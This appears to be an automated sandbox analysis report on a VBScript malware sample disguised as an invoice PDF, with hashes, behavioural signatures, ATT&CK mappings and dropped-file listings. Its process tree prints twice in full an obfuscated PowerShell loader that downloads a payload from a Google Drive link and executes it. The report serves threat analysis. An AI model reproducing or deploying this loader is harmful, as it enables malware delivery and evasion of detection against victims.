fe7ff83680ff3855e060227bddf560db0fe75b141db516320674dace99202224

General

Target

numer faktury_505603890324·pdf.vbs
Size

19KB
MD5

c9db37c76aee446f6df17e38469cc5f5
SHA1

d59d6620ceb71f5bf629c3837340d30a000dc098
SHA256

fe7ff83680ff3855e060227bddf560db0fe75b141db516320674dace99202224
SHA512

ba0888d72496a7518773c3f9fce912ff2b7f43e34dbc06d84b3346c109ff2837b09dd91fd04c75c708fc8a5fd5c4741b03327834aef37c63ff5884cbbe196351
SSDEEP

192:luOrrF5DUyLdYC/ShXcwyoXvWM24RUQr9OFmZOSxn57UYDb/AT/2PszfEciA6aT8:YgF52Muv/OEV7JDQ/2PszfEBhc8

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

3 1628 WScript.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

14 drive.google.com
15 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3968 2000 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

4756 powershell.exe
4756 powershell.exe
2000 powershell.exe
2000 powershell.exe
2000 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4756 powershell.exe
Token: SeDebugPrivilege 2000 powershell.exe

flow	pid	process
3	1628	WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
14	drive.google.com
15	drive.google.com

pid	pid_target	process	target process
3968	2000	WerFault.exe	powershell.exe

pid	process
4756	powershell.exe
4756	powershell.exe
2000	powershell.exe
2000	powershell.exe
2000	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4756	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1628 wrote to memory of 4756	1628	WScript.exe	powershell.exe
PID 1628 wrote to memory of 4756	1628	WScript.exe	powershell.exe
PID 4756 wrote to memory of 548	4756	powershell.exe	cmd.exe
PID 4756 wrote to memory of 548	4756	powershell.exe	cmd.exe
PID 4756 wrote to memory of 2000	4756	powershell.exe	powershell.exe
PID 4756 wrote to memory of 2000	4756	powershell.exe	powershell.exe
PID 4756 wrote to memory of 2000	4756	powershell.exe	powershell.exe
PID 2000 wrote to memory of 3208	2000	powershell.exe	cmd.exe
PID 2000 wrote to memory of 3208	2000	powershell.exe	cmd.exe
PID 2000 wrote to memory of 3208	2000	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\numer faktury_505603890324·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Phenaceturic Betingelsesdel Biblioteksudlaanet Reshipments Eddikens Betsileos Manuma #>;$Peasantries=(cmd /c set /A 115^^0);Function Bundteksters ([String]$Exon){$Klimatologs=8;$Kemibgernsalivation=Volcano($Exon);For($Kemibger=7; $Kemibger -lt $Kemibgernsalivation; $Kemibger+=$Klimatologs){$Sidetallerkeners=$Exon.$Knapper.Invoke($Kemibger, 1);$Flatterers=$Flatterers+$Sidetallerkeners;}$Flatterers;}function Chivvy ($Tic){. ($melopoeic) ($Tic);}function Volcano ([String]$Ernringsfysiologerne){$Kimendes=$Ernringsfysiologerne.Length-1;$Kimendes;}$Peasantries=[char][int]$Peasantries;$Knapper=$Peasantries+'ubstring';$Skamrdmen=Bundteksters 'Organ,sTDisg.orrMerrymeaNonext,n Fluttesk.skadefCibo,sdeSkafninrVibraphrNsvisreiMatrikenCapillagUn ergr ';$Lazarist=Bundteksters 'UnclimbhNedgan,tHorsetotV,ldelipRettelss Notere:Skulk,n/ Autori/ClimactdCivi,isrLnindtgiHemiphrv Forli.eMotorbr.FortllegUdkonkuoCurvogroFugaci,g Af alklpeckingeSausage.Mi htescEgest,ooAmoknurmNegle.e/Proterouspine,ecOmbest.? EdnasceTrianguxSkulderpGlossapoboulevarBerettetSeletfa=.undevedInsug,nofondshaw Epita n oldninlv rdenso IrenesaScupperd La,oni& FritstiSt reomdBraciol=Rosenst1fors.ar7IndkomsE lederen Hainan3 solsortBjesstiBKies.elDParcookJHa,ideseG.ugeab6 FascinwRoentg VunavngiWAerifyiLRemanurbColdhearTofrontMdubleriBPhylloc2As.ylar3NedgrelHTowngatOGarb espcoloquipAstroma7underlgXIrrepeaU fbalanT H.ndreWRa etskdStoresl2Ph.ladiDDomflde ';$melopoeic=Bundteksters 'JournaliFil.ngieProwedaxUn.eare ';$fircylindrets=Bundteksters 'Xylocar$ VinlvmgDinornilScrofulolotteribbookboaaEuxe.itl Sc ewd:Stjert TunionisiThumbikl CrematsPrahmriaBandagenSpringedRegnefue Sekaned.ncowlme Un,urr Benigna=poles i GazomeS SuperitSigteliaRecirkurBe.wepttLeall.a-StvdragB HooteriP,ineuntUdbedrisUdaandeTOutplacrBibrin.a orskern SygneisNae.oidfAnkomneedipla,trBl.bber Rat.ish-ServobrS Cirkulo orskefuRegnvanrSaltlagcInt rmieStatspa Folkesk$UnderfaL KbenhaaFodboldz upersea TidnderGastroci JeaabnsVerdenstBo.sted Tropehj-Su,qualDNoncompeDisket.s,ydrocltUncongristuntmen I.islea Quarr tSensi aiSterlino St,imlnTropist Affolke$ AlcohoTH ltesaeOv.rrankIncarcesKisterstDoegngeiNonpunglC cilieaNetasderSelvantbFi,kedaeMadrigajSygeford BrugereErtholmrK ffrarsHagende ';Chivvy (Bundteksters 'Hundepi$ constig,erciallMis gynoRepentabWholelyaunmystilCaptans:SemiparTVandbadeStilisekBjer.stsFl kepotBundg,ritelepatlHydroseaEvoke,srThaneshbReparabeOver.asjFiresafdStartvreDe,kripr,eduktisB.atsch=Prepack$Gwineude Ad arsnHejrensvLystfis:LibelleaEngulfipTi,edespPosthusdhigh eaaBloatsttHemospoaDec bar ') ;Chivvy (Bundteksters 'MarksmaI ViscoumSeedcakpEquisidoWatchedr UdskydtQ oadse-,orgmesMWater eoSourbeldA.gribeuBortfall Rade,be Subtas RejsetiBShadcheiOptje.et Tanglos IndkliTT opophrForvandaoliniaanUnderlisCaninitfKeramike Blikv,r Oligom ') ;$Tekstilarbejders=$Tekstilarbejders+'\Gravrst.Coo' ;Chivvy (Bundteksters ' Heini.$ riegitgandels.l Maale,oAf opnibSl kaspaUnderv,l se icu: bloodiC TronfroChro.atu Slutk nFormndstDargerke Molassr EructkiTatarenn.llesfodHep tomeOwertern ExpecttAfsindiaTrebleptSuboptiiSeventyoOutflamn Kabine= iparia( AnecdoT ransmieNinetiesionisert Sukrin-E,iteriPDevolataEftersotFormat h Itam,l Saughen$Modera.T Tran,peSclerodkPlatonisnonvolutIndeholiSygeliglParahy aResundsrC managbDebil teConsentjC.mmododInconcle LignifrDy,frossTheftsr)Urinous ') ;while (-not $Counterindentation) {Chivvy (Bundteksters ' TurbopIbestyrefTeratog .onmanu(Sf,rmid$deenergTandouiliPhysapolPu tiersBlyholdaAftraednAsylst,dudsten.eTetra ydUnch lde Ob.kur.pro lamJSolsk noLif.odsb,erfidiSRollic,tObtenebasmitst.tPoitrineLindrin Rdkaa -BesprizecommunaqStm,ale Windsla$ CyclosSWebst.dkbesindea TelegrmSandvaar Bonmotd,issekkmReballoeVitrasenHjlpe i)Pertain Materia{O,erfreSSvips,ntUngatheavibrat rHermelitTerrito- LoblolSS ifflelmuscicaeBantusteUnen,hrpTraluce Samflel1 Unboun}UnmeltaeH,lesialFlerfamsIn,latoeSkattef{Tag rknSTandstitlovoveraLan,vinr BundfltKontr l-Telfon.SProjicelFr.landeSpecialePolychlpKulturp Transpi1re.sour; WeedieC TeglvrhFagraadiindertrv Somedev NonmonyStorebl Hall c$Autoca f Tred.eiAfbdendrDimittecDagafsnySs,ykkelSemiconiAfgrelsnGastropdCaponi,rTeks beeStukloftBaghaansForslvn}Kogepla ');Chivvy (Bundteksters 'udvikli$R.ducedg,nitterlRotatoroStraffebKystbanaKvaltprlPartici:HyperorCdr aattoS perdeuSwashbun P,eacct Mom.oleprocra rCentriciGendarmnUndef ad CowpieeVa.inaenA thenitY.gnobraMarty,it s.yllei ndtrdeoTimelnsn Cyanop=Me erie(PrluderTIdeentie T.ivlrsZonetertRegneud-TendovaPEvakueraNonseditA,etavlhDisting unfound$VrangmaTGuerr,lebiosyntkNonconcsProstattAdeuismi UniverlSmirks,aIsoproprEndetarbPartsfoeOcean,pjFolkered UnrevoeSomatogr mbassasFjernsy)Chu.kin ') ;}Chivvy (Bundteksters 'Fetolog$Selv,adg E,hanclWinegrooVindingbHu chinaDemissilBekmpel: JdedomH pouseheOprrskfnReinte vdetachriUngradus LumskenBeproseiFrbyvean La.ensgRazer ieFastprin Surre, Borger= Bmpele DukketeGCeromaneCyke.kut Unruin-h,wardsCUtilstroActinomnOpbygintStrandeeRoofersn heautot Ma,pak Galpes$Mi,eogrTDevanage LedelskDisk,tes .imulatDebatari Svampel BenediaStatskir A,golab ThisteeBoghvedjKreatiodLbetid eAnretnirKunstaksPolarog ');Chivvy (Bundteksters 'Spidska$k.ybbesgExplicali,citamo sammenbNullabla Husgerlbrinnyu:genotypb Plea.ae Con.enaDataopsu hin.ndmDrablyhoSknaandnIndt end Seetu.eAffatn, Blodba= Feltst Sovepil[BadevanSBud.etryAgrologsSnaps.ct Outbegetvelyd,m Afbeny.immunogCSlovenvoLate,tsnAfsp jlvPailsfueUnc.nnirRegionstFrstest]Flymeka: For ry: SerigrF GremaarOverhatoForcedsmSheafliB SateliaFlelseosUmuliggearts av6Apotele4Ufor.taSForkorttSkibstirHimm,lsiPrededinspygatmgAnastaz(.ikkerh$ PostmaHBeliggeeHoora enValgkonvBlokadeiI ternasMycetopnEmuersaiWondersn Efte lgAccolademedillenTngerne)Forfje, ');Chivvy (Bundteksters 'C,ocody$Nonri.agUnhandcl AfstbnofishboabMarnispaDeedinelCar.occ: NonfacUmindstenFiskerldarisinge.earninrVrd.ersf NstsvgoBirgittrMyosenhsS,bpacktSweetmeaSolutisaStil,ele Fa,ternEtherifd BegyndeStasisf Autofun=tilbage Charmer[C,lpurnSTelefony Be igtsP rietotForsmdee UglifimKob.erv.Barre,mT Udtrknebredygtx Secedet edirig.Exs uitENonwaivn rrivicC,icketoTickprod Electri GrsrodnDagpr.ggMusikra]termitb:Lugter.:CytosinApho,ocaSAltertaCLithopaIPhleba.ICu heab.AntinarGUtopiene oedelatAdfrd mSOve apptKas,emarNedkleniEmport nBar.ategUndersp(Un,ergo$Sta.islbbede,ageIndstniageron ouNonthinmWeddingoSpaniolnChilliedLaareneePing.in)Ph haly ');Chivvy (Bundteksters 'Dislik $KonverggVe,erinlAmtsboroDemontebThermoma BrstfllAfloese:.erraseDMaskinfr LineaeiVaabenlnInspisskThermoma entepebhabi iml WithgaeDefibrisVaginol=Indfrsl$PlagionUGruffien.hermotdClockcyeEmbryomrSupe.smfEksisteotrlkvinrBaadebrsMist lktFarmerea ,nformaAfryddee XylosinD.wnloadPlato,iem skinp.Th,ologsSkalksbu OverskbHgessoes ykkenftPartis.r PresswiOverflynsalooneg Thirty(Fost.rh3Appeten1 Veksli1.ienden2Con,ent2,dstopp3Rapunse,arom.tr3Cro,set1Forlibt3Unthi.k6S ralde7Chu chi)Svrmern ');Chivvy $Drinkables;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4756

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:548

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Phenaceturic Betingelsesdel Biblioteksudlaanet Reshipments Eddikens Betsileos Manuma #>;$Peasantries=(cmd /c set /A 115^^0);Function Bundteksters ([String]$Exon){$Klimatologs=8;$Kemibgernsalivation=Volcano($Exon);For($Kemibger=7; $Kemibger -lt $Kemibgernsalivation; $Kemibger+=$Klimatologs){$Sidetallerkeners=$Exon.$Knapper.Invoke($Kemibger, 1);$Flatterers=$Flatterers+$Sidetallerkeners;}$Flatterers;}function Chivvy ($Tic){. ($melopoeic) ($Tic);}function Volcano ([String]$Ernringsfysiologerne){$Kimendes=$Ernringsfysiologerne.Length-1;$Kimendes;}$Peasantries=[char][int]$Peasantries;$Knapper=$Peasantries+'ubstring';$Skamrdmen=Bundteksters 'Organ,sTDisg.orrMerrymeaNonext,n Fluttesk.skadefCibo,sdeSkafninrVibraphrNsvisreiMatrikenCapillagUn ergr ';$Lazarist=Bundteksters 'UnclimbhNedgan,tHorsetotV,ldelipRettelss Notere:Skulk,n/ Autori/ClimactdCivi,isrLnindtgiHemiphrv Forli.eMotorbr.FortllegUdkonkuoCurvogroFugaci,g Af alklpeckingeSausage.Mi htescEgest,ooAmoknurmNegle.e/Proterouspine,ecOmbest.? EdnasceTrianguxSkulderpGlossapoboulevarBerettetSeletfa=.undevedInsug,nofondshaw Epita n oldninlv rdenso IrenesaScupperd La,oni& FritstiSt reomdBraciol=Rosenst1fors.ar7IndkomsE lederen Hainan3 solsortBjesstiBKies.elDParcookJHa,ideseG.ugeab6 FascinwRoentg VunavngiWAerifyiLRemanurbColdhearTofrontMdubleriBPhylloc2As.ylar3NedgrelHTowngatOGarb espcoloquipAstroma7underlgXIrrepeaU fbalanT H.ndreWRa etskdStoresl2Ph.ladiDDomflde ';$melopoeic=Bundteksters 'JournaliFil.ngieProwedaxUn.eare ';$fircylindrets=Bundteksters 'Xylocar$ VinlvmgDinornilScrofulolotteribbookboaaEuxe.itl Sc ewd:Stjert TunionisiThumbikl CrematsPrahmriaBandagenSpringedRegnefue Sekaned.ncowlme Un,urr Benigna=poles i GazomeS SuperitSigteliaRecirkurBe.wepttLeall.a-StvdragB HooteriP,ineuntUdbedrisUdaandeTOutplacrBibrin.a orskern SygneisNae.oidfAnkomneedipla,trBl.bber Rat.ish-ServobrS Cirkulo orskefuRegnvanrSaltlagcInt rmieStatspa Folkesk$UnderfaL KbenhaaFodboldz upersea TidnderGastroci JeaabnsVerdenstBo.sted Tropehj-Su,qualDNoncompeDisket.s,ydrocltUncongristuntmen I.islea Quarr tSensi aiSterlino St,imlnTropist Affolke$ AlcohoTH ltesaeOv.rrankIncarcesKisterstDoegngeiNonpunglC cilieaNetasderSelvantbFi,kedaeMadrigajSygeford BrugereErtholmrK ffrarsHagende ';Chivvy (Bundteksters 'Hundepi$ constig,erciallMis gynoRepentabWholelyaunmystilCaptans:SemiparTVandbadeStilisekBjer.stsFl kepotBundg,ritelepatlHydroseaEvoke,srThaneshbReparabeOver.asjFiresafdStartvreDe,kripr,eduktisB.atsch=Prepack$Gwineude Ad arsnHejrensvLystfis:LibelleaEngulfipTi,edespPosthusdhigh eaaBloatsttHemospoaDec bar ') ;Chivvy (Bundteksters 'MarksmaI ViscoumSeedcakpEquisidoWatchedr UdskydtQ oadse-,orgmesMWater eoSourbeldA.gribeuBortfall Rade,be Subtas RejsetiBShadcheiOptje.et Tanglos IndkliTT opophrForvandaoliniaanUnderlisCaninitfKeramike Blikv,r Oligom ') ;$Tekstilarbejders=$Tekstilarbejders+'\Gravrst.Coo' ;Chivvy (Bundteksters ' Heini.$ riegitgandels.l Maale,oAf opnibSl kaspaUnderv,l se icu: bloodiC TronfroChro.atu Slutk nFormndstDargerke Molassr EructkiTatarenn.llesfodHep tomeOwertern ExpecttAfsindiaTrebleptSuboptiiSeventyoOutflamn Kabine= iparia( AnecdoT ransmieNinetiesionisert Sukrin-E,iteriPDevolataEftersotFormat h Itam,l Saughen$Modera.T Tran,peSclerodkPlatonisnonvolutIndeholiSygeliglParahy aResundsrC managbDebil teConsentjC.mmododInconcle LignifrDy,frossTheftsr)Urinous ') ;while (-not $Counterindentation) {Chivvy (Bundteksters ' TurbopIbestyrefTeratog .onmanu(Sf,rmid$deenergTandouiliPhysapolPu tiersBlyholdaAftraednAsylst,dudsten.eTetra ydUnch lde Ob.kur.pro lamJSolsk noLif.odsb,erfidiSRollic,tObtenebasmitst.tPoitrineLindrin Rdkaa -BesprizecommunaqStm,ale Windsla$ CyclosSWebst.dkbesindea TelegrmSandvaar Bonmotd,issekkmReballoeVitrasenHjlpe i)Pertain Materia{O,erfreSSvips,ntUngatheavibrat rHermelitTerrito- LoblolSS ifflelmuscicaeBantusteUnen,hrpTraluce Samflel1 Unboun}UnmeltaeH,lesialFlerfamsIn,latoeSkattef{Tag rknSTandstitlovoveraLan,vinr BundfltKontr l-Telfon.SProjicelFr.landeSpecialePolychlpKulturp Transpi1re.sour; WeedieC TeglvrhFagraadiindertrv Somedev NonmonyStorebl Hall c$Autoca f Tred.eiAfbdendrDimittecDagafsnySs,ykkelSemiconiAfgrelsnGastropdCaponi,rTeks beeStukloftBaghaansForslvn}Kogepla ');Chivvy (Bundteksters 'udvikli$R.ducedg,nitterlRotatoroStraffebKystbanaKvaltprlPartici:HyperorCdr aattoS perdeuSwashbun P,eacct Mom.oleprocra rCentriciGendarmnUndef ad CowpieeVa.inaenA thenitY.gnobraMarty,it s.yllei ndtrdeoTimelnsn Cyanop=Me erie(PrluderTIdeentie T.ivlrsZonetertRegneud-TendovaPEvakueraNonseditA,etavlhDisting unfound$VrangmaTGuerr,lebiosyntkNonconcsProstattAdeuismi UniverlSmirks,aIsoproprEndetarbPartsfoeOcean,pjFolkered UnrevoeSomatogr mbassasFjernsy)Chu.kin ') ;}Chivvy (Bundteksters 'Fetolog$Selv,adg E,hanclWinegrooVindingbHu chinaDemissilBekmpel: JdedomH pouseheOprrskfnReinte vdetachriUngradus LumskenBeproseiFrbyvean La.ensgRazer ieFastprin Surre, Borger= Bmpele DukketeGCeromaneCyke.kut Unruin-h,wardsCUtilstroActinomnOpbygintStrandeeRoofersn heautot Ma,pak Galpes$Mi,eogrTDevanage LedelskDisk,tes .imulatDebatari Svampel BenediaStatskir A,golab ThisteeBoghvedjKreatiodLbetid eAnretnirKunstaksPolarog ');Chivvy (Bundteksters 'Spidska$k.ybbesgExplicali,citamo sammenbNullabla Husgerlbrinnyu:genotypb Plea.ae Con.enaDataopsu hin.ndmDrablyhoSknaandnIndt end Seetu.eAffatn, Blodba= Feltst Sovepil[BadevanSBud.etryAgrologsSnaps.ct Outbegetvelyd,m Afbeny.immunogCSlovenvoLate,tsnAfsp jlvPailsfueUnc.nnirRegionstFrstest]Flymeka: For ry: SerigrF GremaarOverhatoForcedsmSheafliB SateliaFlelseosUmuliggearts av6Apotele4Ufor.taSForkorttSkibstirHimm,lsiPrededinspygatmgAnastaz(.ikkerh$ PostmaHBeliggeeHoora enValgkonvBlokadeiI ternasMycetopnEmuersaiWondersn Efte lgAccolademedillenTngerne)Forfje, ');Chivvy (Bundteksters 'C,ocody$Nonri.agUnhandcl AfstbnofishboabMarnispaDeedinelCar.occ: NonfacUmindstenFiskerldarisinge.earninrVrd.ersf NstsvgoBirgittrMyosenhsS,bpacktSweetmeaSolutisaStil,ele Fa,ternEtherifd BegyndeStasisf Autofun=tilbage Charmer[C,lpurnSTelefony Be igtsP rietotForsmdee UglifimKob.erv.Barre,mT Udtrknebredygtx Secedet edirig.Exs uitENonwaivn rrivicC,icketoTickprod Electri GrsrodnDagpr.ggMusikra]termitb:Lugter.:CytosinApho,ocaSAltertaCLithopaIPhleba.ICu heab.AntinarGUtopiene oedelatAdfrd mSOve apptKas,emarNedkleniEmport nBar.ategUndersp(Un,ergo$Sta.islbbede,ageIndstniageron ouNonthinmWeddingoSpaniolnChilliedLaareneePing.in)Ph haly ');Chivvy (Bundteksters 'Dislik $KonverggVe,erinlAmtsboroDemontebThermoma BrstfllAfloese:.erraseDMaskinfr LineaeiVaabenlnInspisskThermoma entepebhabi iml WithgaeDefibrisVaginol=Indfrsl$PlagionUGruffien.hermotdClockcyeEmbryomrSupe.smfEksisteotrlkvinrBaadebrsMist lktFarmerea ,nformaAfryddee XylosinD.wnloadPlato,iem skinp.Th,ologsSkalksbu OverskbHgessoes ykkenftPartis.r PresswiOverflynsalooneg Thirty(Fost.rh3Appeten1 Veksli1.ienden2Con,ent2,dstopp3Rapunse,arom.tr3Cro,set1Forlibt3Unthi.k6S ralde7Chu chi)Svrmern ');Chivvy $Drinkables;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:3208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 2488
4⤵
- Program crash
PID:3968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2000 -ip 2000
1⤵
PID:4276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

Filesize
3KB

MD5
061970f3be09180d9f4da817170240bc

SHA1
e808121ec2a2932eb9521b3bfdcb27b1c4d13a86

SHA256
d65eff1171202c7afe122834b61d11eb7a41edea276398ecb5c7377693856555

SHA512
12a1abf9abf6ced2a33720953688407deb617b7ebe1e8d7158555935c0e1a51ce8e073264a54a2fa6981716d2126cb00d6eb5e754b111c3da33192f4e02b814f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cleach.txt

Filesize
4KB

MD5
c132ead93dd767c6f441efc59786eb6c

SHA1
7d35d3ed07d81c00bdc965a23b7a587a4285d818

SHA256
a5e18065666df9865e94c3f20e3657b0224912d9d877e8564ee99eef4a67844b

SHA512
de5f572665f07a30d2f2371cff8e4960440e16e91a00c6d90e3ef2be9865b793d4fa4370be86b9ad072b725d1302ecb9fa490720d81188246f86792f9096af9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5jonlaf.1g0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2000-300-0x0000000006580000-0x000000000659A000-memory.dmp

Filesize
104KB

Download
memory/2000-285-0x00000000057E0000-0x0000000005846000-memory.dmp

Filesize
408KB

Download
memory/2000-307-0x0000000074450000-0x0000000074C00000-memory.dmp

Filesize
7.7MB

Download
memory/2000-305-0x0000000007490000-0x00000000074A4000-memory.dmp

Filesize
80KB

Download
memory/2000-303-0x0000000007FF0000-0x0000000008594000-memory.dmp

Filesize
5.6MB

Download
memory/2000-304-0x0000000007430000-0x0000000007452000-memory.dmp

Filesize
136KB

Download
memory/2000-301-0x0000000007200000-0x0000000007296000-memory.dmp

Filesize
600KB

Download
memory/2000-282-0x0000000004B00000-0x0000000004B10000-memory.dmp

Filesize
64KB

Download
memory/2000-283-0x0000000005140000-0x0000000005768000-memory.dmp

Filesize
6.2MB

Download
memory/2000-281-0x0000000004B00000-0x0000000004B10000-memory.dmp

Filesize
64KB

Download
memory/2000-280-0x0000000074450000-0x0000000074C00000-memory.dmp

Filesize
7.7MB

Download
memory/2000-284-0x00000000050C0000-0x00000000050E2000-memory.dmp

Filesize
136KB

Download
memory/2000-286-0x0000000005850000-0x00000000058B6000-memory.dmp

Filesize
408KB

Download
memory/2000-302-0x00000000071B0000-0x00000000071D2000-memory.dmp

Filesize
136KB

Download
memory/2000-279-0x0000000004A00000-0x0000000004A36000-memory.dmp

Filesize
216KB

Download
memory/2000-296-0x0000000005940000-0x0000000005C94000-memory.dmp

Filesize
3.3MB

Download
memory/2000-297-0x0000000005F90000-0x0000000005FAE000-memory.dmp

Filesize
120KB

Download
memory/2000-298-0x0000000005FC0000-0x000000000600C000-memory.dmp

Filesize
304KB

Download
memory/2000-299-0x0000000007970000-0x0000000007FEA000-memory.dmp

Filesize
6.5MB

Download
memory/4756-263-0x000001DF669D0000-0x000001DF669F2000-memory.dmp

Filesize
136KB

Download
memory/4756-273-0x00007FFFD8460000-0x00007FFFD8F21000-memory.dmp

Filesize
10.8MB

Download
memory/4756-278-0x000001DF66A20000-0x000001DF66A30000-memory.dmp

Filesize
64KB

Download
memory/4756-277-0x000001DF69090000-0x000001DF690A4000-memory.dmp

Filesize
80KB

Download
memory/4756-274-0x000001DF66A20000-0x000001DF66A30000-memory.dmp

Filesize
64KB

Download
memory/4756-276-0x000001DF68EA0000-0x000001DF68EC6000-memory.dmp

Filesize
152KB

Download
memory/4756-306-0x00007FFFD8460000-0x00007FFFD8F21000-memory.dmp

Filesize
10.8MB

Download
memory/4756-310-0x00007FFFD8460000-0x00007FFFD8F21000-memory.dmp

Filesize
10.8MB

Download
memory/4756-275-0x000001DF66A20000-0x000001DF66A30000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing